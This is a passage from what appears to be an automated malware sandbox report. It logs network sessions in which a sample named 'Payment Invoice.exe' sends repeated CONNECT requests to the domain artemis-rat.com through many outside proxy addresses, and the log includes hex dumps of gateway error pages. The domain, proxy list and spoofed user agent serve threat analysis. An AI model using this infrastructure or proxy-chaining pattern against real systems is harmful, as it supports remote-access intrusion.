                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 74 34 6e 66 33 77 73 39 30 37 62 63 79 6e 6a 71 6e 77 77 38 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 33 2f 31 31 20 32 33 3a 31 35 3a 31 36 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://artemis-rat.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww8z</td></tr><tr><td>Date:</td><td>2024/03/11 23:15:16</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>
                                                                Mar 11, 2024 16:15:17.111833096 CET718INHTTP/1.1 502 Bad Gateway
                                                                Server: Tengine
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 571
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 74 34 6e 66 33 77 73 39 30 37 62 63 79 6e 6a 71 6e 77 77 38 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 33 2f 31 31 20 32 33 3a 31 35 3a 31 36 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://artemis-rat.com</td></tr><tr><td>Server:</td><td>izt4nf3ws907bcynjqnww8z</td></tr><tr><td>Date:</td><td>2024/03/11 23:15:16</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                529192.168.2.4514355.44.42.115583867076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.580761909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                530192.168.2.45177443.134.167.2234437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.583669901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                531192.168.2.45177843.134.167.2234437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.586570024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                532192.168.2.45178443.134.167.2234437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.588479996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                533192.168.2.45178743.134.167.2234437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.590775013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                534192.168.2.451587104.17.210.9807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.590850115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.745136976 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                535192.168.2.45157823.95.209.142156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.593215942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                536192.168.2.45155065.109.211.10131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.657320023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.955250978 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                537192.168.2.45109851.161.131.84492027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.657840014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                538192.168.2.451568167.71.5.8331287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.657875061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.262819052 CET28INHTTP/1.1 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                539192.168.2.451535116.106.105.5510807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.658117056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                540192.168.2.451644203.32.120.202807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.658217907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.812269926 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                541192.168.2.45157598.162.25.29316797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.658298969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                542192.168.2.451654104.24.236.203807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.658623934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.812771082 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                543192.168.2.45117472.167.38.7154107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.659101963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.714400053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.714886904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.714692116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.827069044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:53.011070013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:05.027772903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                544192.168.2.45152243.255.113.232807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.659111023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                545192.168.2.45153465.1.40.4710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.666491985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.055746078 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                546192.168.2.45158072.206.181.105649357076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.671484947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                547192.168.2.451901152.32.132.2204437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.693638086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                548192.168.2.451903152.32.132.2204437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.695046902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                549192.168.2.451908152.32.132.2204437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.696399927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                550192.168.2.451911152.32.132.2204437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.697362900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                551192.168.2.451189107.172.0.1776667076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.697407007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.727066040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.786189079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841665030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.886348963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:52.979846954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                552192.168.2.451674104.16.106.154807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.699759007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.853837967 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                553192.168.2.451677104.18.103.125807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.700545073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.854476929 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
